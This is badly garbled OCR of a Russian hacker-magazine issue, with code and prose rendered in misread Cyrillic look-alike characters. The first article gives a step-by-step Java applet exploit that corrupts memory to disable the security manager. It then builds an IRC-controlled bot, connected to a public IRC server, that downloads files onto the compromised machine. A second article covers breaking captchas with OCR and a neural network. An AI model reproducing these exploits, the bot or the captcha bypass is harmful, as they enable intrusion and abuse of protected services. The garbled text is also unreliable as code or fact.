здатв класс Вут_еРаскесЈКа5т_ег можно, толвко вызвав метод сгеа1:е1л1г:_.т_аЫеКа5т_ег 
класса 'Раз^ег'. 



риЫЈс з^а^Јс ЫгЈ ^аЫеКазТег сгеаТеМг_-ТаЫеКа5Тег(5атр1еМосЈе1 5Шј <-> 
ОаТаВи-Ғ-Ғег сЈҺј Ро__п1: 1осаТ_.оп) ј{_ 



ј-Ғ ( 5гп Јп5Тапс ео-Ғ Ми1Т1Р1хе1РаскесЈ5атр1еМосЈе1 && сЈаТаТуре == РаТаВи-Ғ-Ғег .<-■ 
ТҮРЕ_ВҮТЕ 

&& 5ш. ее1:5атр1е5Ј2е( Ө) < 8) { 

геТигп пеы ВуТеРаскесЈКа51:ег(5тЈ сЈҺј 1осаТ_.оп) ; 



Растр состоит из буфера данных и модели, котора^ умеет извлекатв пиксели из зто- 
го буфера. Из кода видно, что дгт создани^ растра класса Вут_еРаскео!Ка5-сег нужна 
моделв Ми1т_1Р1хе1Раскес15атр1еМос1е1. Конструктор Ми1т_1Р1хе1Раскес15а1пр1еМос1е1 
принимает параметр сЈат_аВЈ_т_0-Ғ-Ғ5ет_ без вс^ких проверок. 



риЫЈс Ми11:Ј РЈхе1Раскес15атр1еМос1е 1(Јп1: сЈ аТаТуре Ј Јгтс Јгтс һ, Јпт <-■ 
питрегО-ҒВЈ т^Ј ЈпТ 5сап1Ј пе5Тг_.сЈеЈ -.ггс сЈаТаВЈ-ТО-Ғ-Ғ^еТ) { 



-Сһ15.с1а1:аВ11:0-Ғ-Ғ5е1: = с1аТаВИ:0-Ғ-Ғ5е1:; 

} 

В конструкторе же Вут_еРаскесЈКа5т_ег рассчитываетс^ значение (Јат_аВЈ_т_0-Ғ-Ғ5ет_ исхо- 
д^ из параметров 5атр1еМос1е1 и Оат_аВи-Ғ-Ғег. 



риЫЈс В уТеРаскесЈКа5Тег(5атр1еМос1е1 5атр1еМос1е1Ј РаТаВи-Ғ-Ғег сЈаТаВи-Ғ-ҒегЈ 
КесТап§1е аКе§__0ПЈ РоЈ-пт ог__§__п, ВуТеРаскесШа^Тег рагепТ){ 



ОаТаВи-Ғ-ҒегВуТе сЈоһ^^(ОаТаВи-Ғ-ҒегВуТе)сЈаТаВи-Ғ-Ғег^ 

• » » 

Јјтс сЈҺО-Ғ -Ғзе-с = с.Ыз.§е*0-Ғ-Ғ5е*(); 

ј-Ғ (5 атр1еМосЈе 1 Јп5Тапсео-Ғ М и1ТЈРЈхе1Раскес1^ 

5атр1еМос1е1) Д_ 

Ми1Т1Р1хе1Раскес15атр1еМос1е1 трр^т = <-> 
(Ми1ТЈРЈхе1РаскесЈ5атр1еМосЈе1)5атр1еМосЈе 1; 



с1а-саВ1-сО-Ғ-Ғ5е-с = трр^т. §еТ0а1:аВ__1:0-Ғ-Ғ5е1:( ) 
+ сШ0-Ғ-Ғ5е1:*8; 



11ТС х0-Ғ-Ғ5еТ = аКе_Јоп .х - огј_ј п.х; 



__1гс у0-Ғ-Ғ5еТ = аКе_Јоп .у - ог__§__п.у; 



сЈ аТа В1Т0-Ғ-Ғ5еТ_+^Ј<0-Ғ-Ғ5 еТ* р1хе1 В1±5± г1сј е 
+ у0-Ғ-Ғ5еТ*5сап1Јпе5ТгЈсЈе* 8; 




Базау^звимостеи: 
суе.гт.ге.огд/суе/ 

Исходники Ме1азр1оЈ1 с кучеи 
реализованных әксплоитов: 
дј.һио.сот/гарЈс17/ 
те.азрЈоЈНгатеууогк 

Шифрование баит-кода с по- 
мошыо АЗМ: 

пгппгатагЈпг.ги/азт/ 



} е1зе { 

"Еһгош пеы Ка 5 - сегҒогта1:Ехсер1: Јоп<-' 
( "Ву1:еРаскес1Ка51:ег5 ти51: һауе" + <-■ 
"Ми11:ЈРЈх е1Раскес15атр1еМос1еГ' ) ; 



} 



Из згого очевидно, что если попробоватв передатв 
в Ми1"с1Р1хе1Раскес15атр1еМос1е1 достаточно болыиое значе- 
ние, то значени^ с1ат_аВ1т_0-Ғ-Ғ5е1: хватит, чтобы выити за пре- 
делы массива. Никаких проверок в коде разработчики не сде- 
лали. 

ИСПОЛВЗУЕМ УЛЗВИМОСТҺ 

Чтобы пон^тв, как исполызоватв у^звимоств, нужно вспомнитв, что указатели в Јауа 
на обвекты представл^кзт собои 32-разр^дное число, что совпадает с типом 1пт_. Та- 
ким образом, если злоумышленнику удастс^ проникнутв за грании,ы массива типа 
1п1: в областв пам^ти, занимаемои об^ектом, то можно будет поставитв нужному 
полкз об^екта указателв на нужное ему значение. Әту технику можно исполвзоватв, 
чтобы убратв менеджер безопасности. Дл^ әтого следует создатв три массива: 

Оа-саВи-Ғ-ҒегВусе сһт = пеы 0а1:аВи-Ғ-ҒегВу1:е(16) ; 

јгтс[] а = пеш Јггс[8]; 

0 һ ј е с т [] оо = пеы 0 о ј е с 1 [7] ; 

Оченв важно создаватв их друг за другом, чтобы втаком пор^дке они хранилисв в па- 
м^ти. Далее вызываетс^ у^звимыи метод: 

Ви-Ғ-Ғегес11та§е Ы1 = пеи/ Ви-Ғ-Ғегес11та§е(4, 1, Ви-Ғ-Ғеге<Ј1та§е.ТҮРЕ_11\1Т_АКС5В); 
Ми1т1Р1хе1Раскес15атр1еМос1е1 5т = пеи/ Ми1"С1Р1хе1Раскес15атр1еМос1е1(0а1:аВи-Ғ-Ғег.4- 
ТҮРЕ_ВҮТЕ, 4,1,1,4, 44 + (_Ј5б4 ? 8 :0)); 

1л1гЈ"саЫеКа51: ег ыг = К а5"сег. сгеа-сеЫгЈ^саЫеКа^^сег^т, <ј5 Тј пи!1 ); 

Ви-Ғ-Ғегес11та§е Ы2 = пеы Ви-Ғ-Ғегес11та§е(пеы МуСо1огМос1е1( ) ј һ/г, -Ға15еЈ пи!1 ); 

Ы1^£етКа51:ег( ) . 5етРЈхе1 (Ө,Ө, пеы Јп1:[]{-1, -1, -1, -1} ) ; 

А-Ғ1ппеТгап5-Ғогт0р ор = пеы А -Ғ1ппеТгап5-Ғогт0р^ 

(пеы јауа. аыт . §еот.А-Ғ11пеТгап5-Ғогт(1, 0, 0, 1,0,0), пи!1 ) ; 

ор.^Ј1-сег(Ы1, Ы2); 

В конструктор Ми1"С1Р1хе1Раскес15атр1еМос1е1 передаетс^ 44 (или 52 дгт 64-разр^д- 
ных проиессоров). Әтого достаточно, чтобы в методе 5т_оге1та§еАггау выити за гра- 
ни1ды массива сЈат_а класса Оат_аВи-Ғ-ҒегВут_е и оказатвс^ на три позии,ии далвше. Если 
массив а расположен сразу за сЫ:, то әто будет поле 1еп§т_һ массива а (заголовок 
массива в пам^ти занимает 12 баит, первые 8 баит хран^т хеш-код и атрибуты, по- 
следние 4 баита — длина массива). Метод 1п11:ег ( ) запишет по әтому адресу зна- 
чение -1 (значение пиксел^, переданное в метод 5ет_Р1хе1). Так как в Јауа тип 1пт_ 
всегда знаковыи. то -1 или ОхҒҒҒҒҒҒҒҒ поеобоазүетс^ в максималвное значение. 



Исследование 
от Казрегзку 1_ао: 
Ыј.1у/1һиисЈ4а 

Јауа ОојесЈз Метогу 
51гис1иге: 
сосЈеЈпз^гисИопз. 
сот/2008/12/јауа-оһјес!5- 
тетогу-51гис1иге.һјт1 



В резулвтате массив а в глазах виртуалынои машины будет обладатв огромным раз- 
мером и станет возможно обраидатвс^ к содержимому массива обБектов оо, как буд- 
то зто массив 1п1:. 

Дгт успешнои атаки можно восполызоватыз^ рефлексиеи. Рефлекси^ — зто ме- 
ханизм, которыи позвол^ет узнатв информаи,икз об обвектах и их пол^х во врем^ вы- 
полнени^ программы, а также производитв операи,ии над әтими пол^ми и методами. 

Чтобы избавитвс^ от менеджера безопасности, нужно выполнитв метод 5у5т_ет. 
5е1:5есигз.т_уМапа§ег(пи11). Успешно его выполнитһ можно, если восполызоватыз^ 
классом 5т_ат_етепт_, которыи позвол^ет выполн^тв лкзбые методы. Однако в классе 
5т_ат_етеп1: выполн^етс^ проверка, разрешен ли метод контекстом доступа, которыи 
задаетс^ системои в переменнои асс. Поәтому необходимо заменитв значение асс 
на контекстс А11Регт15510П5. Дл^ әтого нужно проинии,иализироватв массив оо дан- 
ными дгт рефлексии. 

5"сг:_п§ пате = "5 е1:5есиг--1:у Мапа§ ег"; 
Ок>јес*[] о ! = пеы 01зјес*[1 ]; 
оо2 ( = пеы 51:а1:етеп1:(5у51:ет. с!а55 . пате, о1); 
Регт15510П5 р5 = пе и/ РегтЈ55Јоп5( ) ; 
Р5.ас1с1(пе\л/ А11Регт15510п()); 
оо[3] = пеы Ассе55С оп1:го 1Согтсех 1:( 
пеы Рго"сес"СЈопРотаЈп[ ] { 
пеы Рго"сес"сЈопРотаЈп( 
пеы СосЈе5ои гсе( 

пеш јауа.пе1:.иК1.("ҒЈ1е: /// " ) , 

пеы јауа . 5есигЈ1:у . сег1: . С^г±ј јјса±еӨ (), р5) 

оо [4] ^Х(5" са " сетеп " с )°°[2] ) • §е1:Таг§е1:() ; 

Такое расположение данных поможет наити позии,икз нужных указателеи. 

јгтс оо_.еп = оо . 1еп§1:һ; 

-Ғог(ЈпТ. Ј =о1сИеп+ 2; ј < о!сИеп+ 32; ј+ +) 

// оо[Ө]==пи!1 && оо[1]==пи!1 

1-Ғ (а[Ј_-1]==оо1_еп && а[__]==Ө && а[1+1]==0 
// оо[2.3.4] != пи!1 

&& а [Ј+2]!=0 && а[Ј+3]!=Ө && а[Ј+4]!=0 

// оо[5.6] == пи!1 

&& аЈ+5 (==0 && а1+6 (==0) 

Поле асс располагаетс^ сразу перед полем т_аг§ет_ (если взггтнутв в исходники). 
Указателв нат_аг§ет_, помеиденныи в оо[4] , помогает обнаружитвуказателв назначе- 
ние асс и заменитв его на контекст вседозволенности из оо[3] . 

1п± 5ТтТг§ = а[1+4]; 
-Ғог(Јп1: ј=Ј+7; ј < Ј+7+64; ј++){ 
ј-Ғ (ај ( == 5ТтТг§) { 



а[ј-1] = а[ј+3]; 
-Ғоипс! = т:гие; 



бгеак; 

} 

} 



Остаетс^ толһко выполнитһ ехесит_е(), чтобы получитв полные права в системе. 

ј-Ғ (-Ғоипс!) 

((51:а1:етеп1:)оо[2] ) . ехеси1:е( ) ; 

Теперв апплет может создаватв фаилы, сетевые соединени^, запускатв программы 
и многое другое. 
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Тестирование зловреда 

СОЗДАЕМ КОМАНДНЫИ ИНТЕРФЕИС 

Чтобы восполвзоватвс^ открывшимис^ возможност^ми, хакеру необходим гибкии 
интерфеис управлени^ зловредом. С зтои задачеи хорошо справл^етс^ библиотека 
Р1гсВот_. Она занимает всего 200 Кб и позвол^ет легко создаватв ботов дгт 1ПС-ка- 
налов. Әто привлекает хакеров, посколвку дает возможноств легко управл^тв пора- 
бошеннои машинои и добавл^ет әлемент анонимности. Скачатв библиотеку можно 
отскода: јЈоЫе.огд/рЈгсооЈ.рһр . 

Чтобы изготовитв бота, нужно лишв наследоватвс^ от класса Р1гсВот_ и перео- 
пределитв метод получени^ сообшении. 

риЫЈс с!а55 За уаВот: ехт_епс15 РЈгсВо+. { 
риЫЈс ЗауаВо1:() { 

5 е 1: N а т е ( " Ј а V а Во±11 ' ) ; 

} 

риЫЈс УОЈс! о пМе55а§е(5т:гЈп-§ сһаппе!, 51:гјп§ 5епс!егЈ 5т:г1п§ 1о§ј Пј <-■ 
51:гј п§ һо51:патеЈ 5"СГ1п-§ те55а-§е ) { 



л 

} 



Например, можно научитв бота закачиватв фаилы командои с1омп1оас1 <адрес> <имл 
фаила на диске>. 

Ј-Ғ (ше55а§е. 5"саг1:51л1 Ј1:һ("с1оып1оас1") ) { 
51:гј п§[ ] рагС5 = ше55а§е . 5р 1Ј1:( " " ); 
5"Сгјп§ иг! = раг"С5 [1]; 
5"СГ1П§ теИате = рагС5[2]; 

5епс1Ме55а§е(сһаппе1Ј 5епсЈе г + ": Р оып1оас1Јп§ " + иг1); 



5ауе1Јг1(111еМатеЈ иг1); 

5епс1Ме55а§е(сһаппе1Ј 5епс1 ег + ": Роып1оас1ес1 1:о " + 1п1еМате) ; 
} са1:сһ ( 10Ехсер 1:Јоп е) { 

5епс1Ме55а§е(сһаппе1Ј 5епс1 ег + ": Роып1оас1 -ҒаИес! " + иг 1); 

} 

} 

Осталосв присоединитвс^ к 1ВС-каналу, чтобы протестироватв работоспособноств 
программы. 

соппе с1:("Јгс .-ҒгеепосЈе. пе1:" ) ; 
Ј01пСһаппе1 ("#ЗауаВо1:пе1:"); 

ЗАКЛК>ЧЕНИЕ 

Јауа предоставл^ет болвшие возможности, которые не всегда исполызукггс^ во бла- 
го, о чем свидетелвствует все возрастакзидее число малвари. Чтобы затруднитв ее 
обнаружение антивирусными программами, злоумышленники прибегакзт к шифро- 
ваникз баит-кода, рефлексии и другим приемам. Позтому необходимо приниматв 
меры безопасности: своевременно обновл^тв ЈВЕ и запрешдтв выполнение подо- 
зрителвных программ в браузере. 



ОББЕДИН^ЕМ ТЕ55ЕРАСТ И ҒАЫЫ В БОРҺБЕ 
ПРОТИВ ПУБЛ ИЧНОГО ТЕСТА ТҺКЗРИНГА 

Если өстһ готовые решени^, нетсмысла 
изобретатв костыли и велосипеды. С осо- 
бым иинизмом әто утверждение доказали 
авторы криптолокера, которыи длл своих 
иелеи полвзовалсл Сгур1оАР1 :). Справедли 
во оно и длл решенил нашеи сегоднлшнеи 
задачи — расшифровки капчи (с образова- 
телвными иел^ми, разумеетс^). Вперед, за- 
пускаем \/1зиа1 31исИо! 



▼ 

Оушаг 

тгс!уууаг@дтаЈ1.сот 



ВСТУПЛЕНИЕ 

Весв прсидесс предсто^идеи работы можно условно поделитв на несколвко 
әтапов: 

• скачатв картинки; 

• убратв шумы и другие искусственные искажени^; 
выделитв области св^занности (символы), сохранитв их; 

• обучитв неиросетв или создатв словарв; 
распознатв. 

В әтом нам помогут: 

• АҒогдеЫет — библиотеки компыотерного зрени^ и искусственного интел- 
лекта; 

• Тез5егаст — программа дгт распознавани^ текстов; 

• Ғаппс!отпет\л/гаррег — обертка .ЫЕТ неиросети ҒАЫЫ; 

• алгоритм поиска св^занности СС1_А от Отаг Өатее! 5а1ет. 




ПОДГОТОВИТЕЛВНЫИ ӘТАП 

Запускаем \/Јзиа1 ЗтисПо и создаем новыи оконныи проект на ^зыке С#. Откроем 
его в проводнике, дгт того чтобы скопироватв туда требуемые фаилы. 

Начнем с аТогдепе^.сотДгате\л/огк/с1о\л/п1оас1з.һ^т1 , заходим на саит и ска- 
чиваем архив «АҒогде.ЫЕТ Ғгате\л/огк-2.2.5-(Иһз оп1у).2Јр» по ссылке Оо\л/п1оас1 
ЫһгагЈез Оп1у. Из него нам понадоб^тс^ толвко следукзидие библиотеки: АҒогде. 
с!И, АҒогдеЈпладтд.сШ, АҒогдеЈтадтд.Ғогплатб.сШ и АҒогде.Матһ.сШ, другие же 
можно удалитв. 

Далее идем на һирз://дИһиһ.сот/сһаг1ез\л/Деззегас^ читатв инструки,и10 
по установке Теззегаст ЫиӨет Раскаде и ^зыковым дата-фаилам. Ввтснили, 
что еств два пути установки пакета ЫиӨет: через консолв или Ө111. Проиде всего 
второи вариант, дгт әтого в \/Јзиа1 51ис1Јо нашего проекта переходим на вкладку 
«Сервис — > Диспетчер пакетов ЫиӨет — > Управление пакетами ЫиӨет дгт реше- 
ни^...». В открывшемс^ окне переходим на раздел «В сети — ► пидет.огд», в стро- 
ке поиска пишем теззегаст, и нужныи нам пакет «А .Ыет \л/гаррег Тог теззегаст- 
осг» будет первым и единственным в списке. Нажимаем «Установитв» и ждем 
пару секунд, все произоидет автоматически — создадутс^ новые папки с тре- 
буемыми фаилами и настроиками в проекте. Замечу, что деиствует әтот ЫиӨет 
Раскеде толһко дгт текуидего решенил и ничего другого не затронет. В резулв- 
тате мы сможем исполвзоватв зтот моидныи инструмент путем добавлени^ изЈпд 
Теззегаст в нужныи класс. Осталисвтолвко готовые ^зыковые пакеты (если тако- 
вые потребукзтс^), они наход^тс^ тут . Берем толвко фаилы версии 3.02! Копиро- 
ватв их следует в папку «Наш проект\Ып\Оеоид\те55с!ата», например, у мен^ тут 
наход^тс^ епд.тгајпес!с1ата, еди.тгајпес!с1ата и другие. 

Затем из ресу рса достаем неиросетв в виде Ғапп.Ыет.сШ и таппсЈоиЫеМТ. 



с111. Кладем их р^дом с библиотеками АҒогдеЫе! в папке самого проекта. 

Последнии ингредиент — СС1_Алежит тут . Нажимаем «Оо\л/п1оас! 7.\Р» и вска- 
чанном архиве находим папку Соппес1:ес1Соплропеп1:1_аое1тд, откуда забираем 
весв проект, или в своем создаем новыи класс и копируем в него содержимое 
из 1Соппес!ес1Соплропеп{1_аоеИпд.с5, СС1_.С5, 1_аое1.С5 и РЈхексз. Когда их код 
полностыо окажетс^ внутри одного класса (с неболвшим допилом), ошибок 
возникатв не должно. 

Все готово? Тогда последнее. Устанавливаем ссылки на библиотеки 
АҒогдеЫе! и неиросети ҒАЫЫ (ВеТегепсез — > Добавитв ссылку) дл^ текушего 
проекта, провер^ем, чтобы студи^ не ругаласв на ошибки. Накидываем кнопки, 
текстбоксы и другие чудеса интерфеиса в Ғогт1 на свои вкус, то же самое де- 
лаем и с Ғогпл2, показаннои на картинках. 

Да, неболыиое дополнение: возможно, что в Арр.Соп1лд тебе придетс^ до- 
бавитв строку 5т_агт_ир иБе^е^асуУгКип-ЫтеАс-Ыуа^Ыоп-РоИсу^^Чгие", чтобы 
все заработало на .ЫЕТ выше второи версии. 



ШАГ ПЕРВЫИ. СКАЧАТВ САРТСНА 

Открываи исходник, которыи можно вз^тв на сһ/<±хакер.ги. Открыл? Отлично, 
он нам понадобитс^, посколвку в әтои статве мы не будем публиковатв кило- 
метры кода, уделив болвше времени его по^сненикз. 

Итак, на первом зтапе нам нужно в автоматическом режиме заполучитв 
требуемое количество образи,ов. Создадим метод загрузки картинок в пап- 
ку на рабочем столе с автоматическим нумерованием фаилов и поддержкои 
прокси. Количество обработанных запросов будем выводитв в прогрессбар 
через еуеп.. 

Чтобы наша форма не подвисла, создадим новыи поток Тһгеао" 
с1о\л/п1оас11таде5Тһгеас1. И да, все потоки в әтом приложении имекгг атрибут 
15Васк§гоипс1 = т_гие. Еслиполвзователвпроизводитзагрузкукартинокневпер- 
выи раз, то сначала провер^ем наличие папки дгт сохранени^ картинок и их ко- 
личество, чтобы нумероватв их далее в правилвном пор^дке. Метод, которыи 
выполн^етвскзработу, имеетсигнатурууо1с1 ио1\/п1оас1Кето1:е1та§еҒ11е(5т_г1п§ 
§ет_1Јг1Ј 1П"с пит, Аггау1_15Т_ ргоху, 1ггс т_1теоит_) , где деШг1 — адрес кар- 
тинки; пипл — количество запросов к неи. Внутри него и,икл Тог по числу пипл, 
а номер итераи,ии передаетс^ событикз 1-Ғ (Меи/Еуегтс != пи11) Ме\л/Еуепт_(1 + 
1), которое ловит наш основнои класс и присваивает резулвтат прогрессбару 
рго§ге55Ваг1 . 1пуоке(пем Аст_1оп(() => { рго§ге55Ваг1 . \/а1ие = 1пс1еХ; 
})), расположенному внизу главного окна. Само сохранение картинки произ- 
водитс^ стандартно. 



ШАГ ВТОРОИ. ОБРАБОТАТВ ИЗОБРАЖЕНИЕ 




Самыи сложныи әтап, он индивидуален дл^ каждого вида сар.сһа. Мне 

пчрнк нпдкатпа бибпиптр^м АҒпглрпрт кптппыр пчрнк \/пп6нп \л гчгҺгҺрктмр- 



но помогакзт реализоватв некоторые филвтры (Со.огҒПтеппд, ОПатат.оп, 
Сопзеп/ат.уеЗтоотЫпд, СаппуЕс!деОетестог и так далее), болвшинство кнопок 
на форме как раз исполвзукзт әтот функи,ионал. Также присутствует возмож- 
ноств указатв и,вет кликом мыши на нужном участке картинки, сделано зто 
через событие МоизеОо\л/п на р.стигеоох и передачеи координат на картинку 
дгт извлечени^ и,вета в рЈхе!Со1ог. 
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ШАГ ТРЕТИИ. ВЫДЕЛИТВ СИМВОЛЫ 

Здесв исполвзукзтс^ три готовых решени^, расположенные в нижнеи правои 
части главнои формы, в әлементе Таһз. Первыи — әто Теззегас!: ОСВ с возмож- 
ноствкз задани^ размера отступа дл^ наиденных символов. Второи — АҒогде. 
пе1:, которыи принимает параметры максимум и минимум высоты и ширины 
об^ектов, которые надо выделитв, плкзс филвтраии^. И третии, он же самыи 
силвныи, — ОШегСС^ принимает два параметра, задакзших рассто^ние меж- 
ду пиксел^ми, которые будут считатвс^ сосед^ми (одним символом). В случае 
если наиденные символы слилисв, то еств пиксели в них расположены вплот- 
нукз, надо обрабатыватв әто событие отделвно. Задатв размер, которыи счита- 
етс^ нормалвным, и при его превышении разделитв слившиес^ точки в месте 
самого слабого соприкосновени^ и повторитв проверку заново. Данна^ над- 
строика не была реализована, рассматриваема^ мнои сар1:сһа редко выдавала 
такои финт. 

• Теззегаст исполвзует ТеББегас"!; . Ра§е ра§е = ОСКт:е55егаст:еп§1-пе302. 
Рпосе55(1ш§), далее на әтои странии,е примен^етс^ изјпд (уаг јтег = раде. 
Өет1тегатог()). Находим дл^ каждого 1-Ғ (1т:ег .ТгуСет:Воипс11п§Вох(Ра§е1т: 
егат:ог1еуе1.5утһо1Ј оит: 5утһо1Воипс15) ) значение һоо1 и присваиваем 
Р1х р = 1Т:еп.Сет:1та§е(Ра§е1т:епа1:ог1еуе1.5утһо1Ј рас1с11п§1еуе1Ј оит: 
Сј оит: V) уже сам символ, если выражение вернуло тгие. 



АҒогдеЫе! — поиск св^занных частеи реализован проиде. Создаем 
В1ооСоигтг.ег һс = пем В1оһСоипт_ег(), затем даем ему картинку Еп§1пе. 
һс . Ргосе551та§е(1та§е) и на выходе ловим пр^моуголвники Кест_ап§1е[ ] 
гест_5 = Еп§1пе.һс.Сет_0һјест_5Кест_ап§1е5(), которые в и,икле Тогеасһ 
вырезаем через Сгор сгор = пем АҒог§е. 1та§:_п§. ҒИ^егз . Сгор(пе\л/ 
Кест_ап§1е(гест_. 1_осат_10п., гест_ . 5:_--е) ) и сохран^ем в массив картинок. 
СС1_1 иш,ет соседние пиксели в Се1:№1§һһог:-.п§1_аһе15(Р1хе1 р1х), которыи и,и- 
клами -Ғог (хгтс 1 = р1х.Ро51"с:Ј.оп.Ү - уҮу; 1 <= р1х.Ро51"С10п.Ү + уҮу && 
1 < _һе1§һ1: - уҮу; 1++) и -Ғог (_1п1: ј = р1Х.Ро51Т_10п.Х - хХх; ј <= р1х. 

Ро51т_:-.оп.Х + хХх && ј < и/±с1"с:һ - хХх; ј++) провер^етусловие 1-Ғ (1 > -1 

&& ј > -1 && ЈзоәгсЈЈј 1 ( != 0) и в случае .ше выполн^ет пеЈдһооп"пд1_аое15. 
АЈЈсКЈзоагсШ, \]). 



ШАГ ЧЕТВЕРТЫИ. СОХРАНИТВ СИМВОЛЫ 

Удобство и ленв! Кнопка ПипИЧҒП.ег открывает вторукз форму, филвтры в кото- 
рои примен^кзтс^ уже в автоматическом режиме. Их надо настроитв заранее 
под каждыи вид сар.сһа отделвно. Задача формы — применитв филвтры, раз- 
делитв символы, сохранитв указанные полвзователем или автоматически наи- 
денные (Теззегаст) св^зи «буква — картинка» в отделвнукз одноименнукз пап- 
ку. Әто означает, что в кони,е проделаннои работы база данных дгт обучени^ 
создаетс^ автоматически и может бытв исполвзована как дгт Теззегас., так 
и дгт ҒАЫЫ. Но с одним условием: дгт неиросети все картинки должны бытв 
одного размера, что в даннои программе считаетс^ тоже одним из филвтров 
(ВезЈге) и задаетс^ в правои части главного окна\/\//Н. И не оставл^и много пу- 
стого пространства на картинках, зто собвет ҒА1ЧЫ с толку. Допустим, у нас еств 
1 000 картинок и на некоторых из них много пустого белого и,вета; неиросетв бу- 
дет считатв, что әто частв буквы, и все другие картинки, где тоже много белого 
|двета по кра^м, будут приравниватвс^ к неи. Получим неправилвныи резулвтат, 
и все придетс^ начинатв заново. Пон^тно, что буквы бывакзт разного размера, 
и, например, а по сравненикз с Т или даже У\1 оставит белыи участок сверху или 
снизу. Но никто не запреидает приводитв их к одному размеру, заведомо иска- 
жатв/сжиматв дгт себ^ (аточнее, дгт неиросети). 

Сохранение реализовано и,иклом по 24 әлементам массива картинок, 
и если содержимое не равно пи11, то получаем {ехШохЛех. под әтим әлементом 
и сравниваем с пустои строкои. Если строка не пуста^, то провер^ем, суиде- 
ствует ли папка с таким именем, помеида^ в него әту картинку. Когда строка 
пуста^ или содержит более одного символа, резулвтат сохран^етс^ в папку 
Өагоаде. Саму сар.сһа с именем, совпадакзидим с правилвным вводом текста, 
сохран^ем в 1гладе5, дгт последукзидеи возможности автоматизаи,ии провер- 
ки на про1дент корректного распознавани^. Весв прогресс также отображаетс^ 
на ргодгеззВаМ . 



ОеСарЈһса 



_ с 



5 1 



1 
1 


.г 


| 

\ 


9 


















2 


5 


ј 3 


9 


1 6 

1 1 


1 5 I 















ЛГк40 Д0х40 1П-.-4П П0х40 ЛОж40 ,10x40 0x0 0x0 0x0 0x0 



0x0 ОхО 



0x0 



0x0 0x0 



0x0 



0x0 



0x0 0x0 



0*0 



0x0 0x0 



ОтО 



0x0 



X 



\( Ыоһ НОСГ! опо1уге јпсаггес! 

Н|Мн| у(]Ш |Г|1Н(ЈН ПН1ГШ 

(И еҺолј1(Ј кк 1һе впсүүөг) 



Ј 3 



ҒЈИ 



Ми1 



Зо1 

ГЈ1|| 

Ғ 



һот 

\ХХХ.Г. 



ШАГ ПЛТЫИ. ОБУЧЕНИЕ 

Начнем с ТеззегасТ, дгт его обучени^ требуетс^ создатв три фаила: ТезТ.апа!. 
ехрО.оох, ТезТ.апакехрО.ТЈТ, ТезТ.апакехрО, где ТезТ — им^ словар^, ап'а1 — им^ 
шрифта, ехрО — номер фаила, оох — зто текстовыи фаил, где указаны коорди- 
наты каждого символа, ТЈТ — картинка, третии ^вл^етс^ копиеи первого. Дл^ их 
создани^ предназначена кнопка ӨепРарегз, котора^ исполвзует следукзидии 
код: 

ЈЛ5"С<СепРарег5> &епрарег1Ј51: = пеш 1_Ј51:<СепРарег5> { }; 
0епРарег5 1:етр§епрарег = пеш СепРарег5(); 
5±Г1П§[] сИг5 = РЈгесгогу . СетРЈгес"СогЈе5(ЕпуЈгоптеп1: .<-■ 
6е1:ЕпуЈгоптеп1:\/агЈаЫе ( "и5егргоТ11е") + "\\Ре5к1:ор\\ТЕ5ТРАТА\\"); 



-Ғогеасһ (уаг И:ет ј_п с11Г5) 
{ 

5"сгјп§ һһ = 1 - сет.5ио5"СГ1п§(:1 - сет. 1_а5"с1пс1ехО-Ғ((а)"\") + 1); 
ј-Ғ ( рр == "1та § е5" | | оо == "Сагоа§е ") соггсјпие; 
§епрарегН5"С.Ас1с1(пе\л/ СепРарег5{ сЈЈ г = Ј1:ет.То51:г Јп§() ,<-■ 
ТЈ1е5 = Р Јгестогу.СетҒЈ1е5(Јтет.То51:гЈп§() , "*.рп% ") }) ; 

Ј 

-Ғог (јгтс ј = 0; ј < §епрарег1Ј5"с.Соигтс ; ј++) 
{ 

тетр§епрарег^^(0епРарег5)§епрарег115±£1] ; 
и5Јп§ (6гарһЈС5 § = Сгарһ1С5 . Ғгот1та§е(В10Ых_) ) 

{ 

-ҒогеасһДх/аг 1тет з.п тетр§епрарег .1п1е5) 



. . . *Рисуем 

} 

-4 



риЫЈс с!а55 бепРарег з : 1_Ј51:<51:гЈп§ > 

риЫЈс 51:гЈпе сИг { §е1:; 5еј; } 
риЫЈс 51:гј п§[] 1п1е5 { §е±Ј 5е ј; } 

Здесв исполвзуетс^ класс ӨепРарегз с двум^ пол^ми, первое — им^ папки, 
второе — полныи путв дл^ всех картинок внутри зтои папки. Далее произво- 
дитс^ поиск и наполнение обвекта депрарегИз!: данными, после чего в и,икле 
Тог начинаем работатв с каждои директориеи в отделыности, рису^ извлечен- 
ные данные на болвшом холсте и попутно записыва^ координаты дл^ оох-фаи- 
ла. Полученныи резулвтат требуетс^ задатв аргументами к установленному 
Теззегас! в Ргодгат ҒНез. Достаточно одного оаТ-фаила, которыи проведет все 
деистви^ в автоматическом режиме. Подробнал инструкиЈ/т по обученикз на- 
ходитс^ здесв . 
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Дл^ обучени^ неиросети ҒАЫЫ исполызована частв кода из Теззегас!:, от- 
личие заклкзчаетсл в том, что мы создаем один текстовыи фаил 1гаЈп.1г, в кото- 
ром перва^ строка — количество картинок, количество точек в каждои (ширина, 
умноженна^ на высоту) и количество выходов (букв, которые мы иидем). Сама 
картинка до всего зтого проходит облзателвнукз бинаризаи,икз, дл^ того что- 
бы выделитв всего два состо^нил каждои точки (1 — черныи, 0 — белыи и,вет), 
и сохран^етс^ далее в әтом же фаиле во всех следукзидих строках. Дл^ удобства 
и возможности исполвзоватв разные заранее созданные обученные апп-фаилы 
был создан дополнителвныи текстовыи фаил СОЫҒ.О.М. Он состоит из однои 
строки и указывает количество точек и выходов с их значени^ми, случаино запу- 
ститв проверку сар1:сһа на другом апп-фаиле не получитс^. 

5*гЈп е а = ҒИе . КеасЈА 11Тех 1:(5ауеҒЈ1е5Ра1: һ + "ШҸҒ16.-СХ*:" ) ; 
5±Г1П§[ ] һ = а.5рП1:( ' ' ); 



1п± 5итР1х = Сопуег1 : .То1ггс 32(р[Ө] ) ; 

јггс Ои-Јгрј: = Сопуе гс.То1г гс32( Ы (Л еп^һ); 



ијггс[ ] 1ауег5 = { (и Јггс)5итРЈХЈ (и1гтс)1ауег5Ј (иЈгтс)0и1:ри 1: }; 

пе1: . Сгеа1:е51:апс1агс1Аггау (1ауег5Ји^ 

пе-с . Капс1отЈ2е1лЈеЈ§һ1: 5(-Ө.1Ј 0.1 ) ; 

пе1: . 5е"с1_еагп1п§Ка1:е(0 . 7-Ғ) ; 

ТгаЈпЈп %Ра"са с!а"са = пеш Тг аЈпЈп§Ра"са( ) ; 

